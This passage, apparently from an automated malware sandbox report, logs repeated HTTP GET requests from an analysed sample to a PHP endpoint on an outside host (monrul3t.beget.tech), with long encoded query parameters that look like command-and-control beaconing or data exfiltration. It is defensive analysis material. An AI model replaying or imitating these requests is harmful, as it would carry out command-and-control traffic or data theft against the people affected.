kFVNRTWH90MnpWSzlUeQl2bql0dnRkWxE1RadXRE1UeVR0T1UlMZhmUy4UbCRlW0U1VZhXRy00MNpmT0kVbOBzaU10akRUT4l0QMlWTYJ2ZBpmTp9maJRzZU5Uaa1WTw0kaZpmVX10MJJTT5F1RaJTRyk1aGpmTsJlMOxmUtpVaO1mTsJkeO1mUql1aKlXZ2k0UZBjRHJFMohlWpd3UOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2aD90Zj1mYwJESjxmUzU1ZNRkT4F0QixmUyImTClmTntGSiBXMXl1RCNkTyc3VaBTNXN1bBlWZJRWRJdXUqxUeBNUUnFERNJTWElkVCFTUnlEVL5kUGtEbKNjYEJ0ULNFaDJGbS5mYKpUaPlWVXJGa1UlVR50aJNXSTt0QkVUS4d2QJhkTwQFRKpWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpNGROpXV610dJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQjZjhDZ0MWZxY2M0ITN0MGNjdDNklzM2kjN5EmNwcDZiwiIjNWYmZmYkJmMzYDMxUDM1QWO2E2MmVWOxgjYjlTZjNDNiZGO3UjN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.tech
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=d1nIiojI0Y2Y4QGNjVWMmNDNyUDNjRzY3QDZ5MjN5YTOhZDM3QmIsIyN3UWZ4gTMwADZ5QWM0kjZzQTNhJjN0MDNiJjYiljN2cTOkNTMiRDOiojIlZTY4UTOjlTYkNmZzUjZyYTZxMmNhlDM0IDZ5MmYiNmIsICNjlTN3ITM4EzN4kDOmRmYxYzY4QzNwcjNjlTY4EGN5QGZ1MGO2AjMiojI0QGOzETZiNTNwkzNkJWOzE2NjV2Y0ETY1ADZkZ2YjFmI7xSfikTMulEeVp2T6lkaPhXSqlkNJlmWyMmeOBzZUpFeVpnTx0kaOpmTU9UMV1WWrp0VNBTWE90akR0ToRGRahmSXlVaGdlWtJlMNl2dplEbBpXTp9maJVTQU1kMrpWW5VERahmW650MJRVT1EFVNBTUUpFMjR0T61keNdXWqplaORUTwEkeOlXRqp1dJNETpV1QNl2bql0aaR0TtJkaZJTRqlFaGdVTsZEVPFTSykFbWpWTshGRNdXRq5UMjpXWsJEVZBTRX9UaK1mWyk0QMlWVD10dFpWS2k0QNFTUU1kMZRkTyUEVPtmU610dJ1mW6llaaBzZU5ENRd1TqZkaaBTQUlFaa1mTsZlaORTV61Ua3lWSvkUaPlWUql1MV1WWqZ1VNpmV61kMBpnTrxGVNpmSH9UbSdkTyklMNhXTUpVeVRVTzkFVNRTWH90MnpWSzlUeQl2bql0dnRkWxE1RadXRE1UeVR0T1UlMZhmUy4UbCRlW0U1VZhXRy00MNpmT0kVbOBzaU10akRUT4l0QMlWTYJ2ZrpXTp9maJRzZU5Uaa1WTw0kaZpmVX10MJJTT5F1RaJTRyk1aGpmTsJlMOxmUtpVaO1mTsJkeO1mUql1aKlXZ2k0UZBjRHJFMohlWpd3UOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2aD90Zj1mYwJESjxmUzU1ZNRkT4F0QixmUyImTClmTntGSiBXMXl1RCNkTyc3VaBTNXN1bBlWZJRWRJdXUqxUeBNUUnFERNJTWElkVCFTUnlEVL5kUGtEbKNjYEJ0ULNFaDJGbS5mYKpUaPlWVXJGa1UlVR50aJNXSTt0QkVUS4d2QJhkTwQFRKpWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpNGROpXV610dJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQjZjhDZ0MWZxY2M0ITN0MGNjdDNklzM2kjN5EmNwcDZiwiIjNWYmZmYkJmMzYDMxUD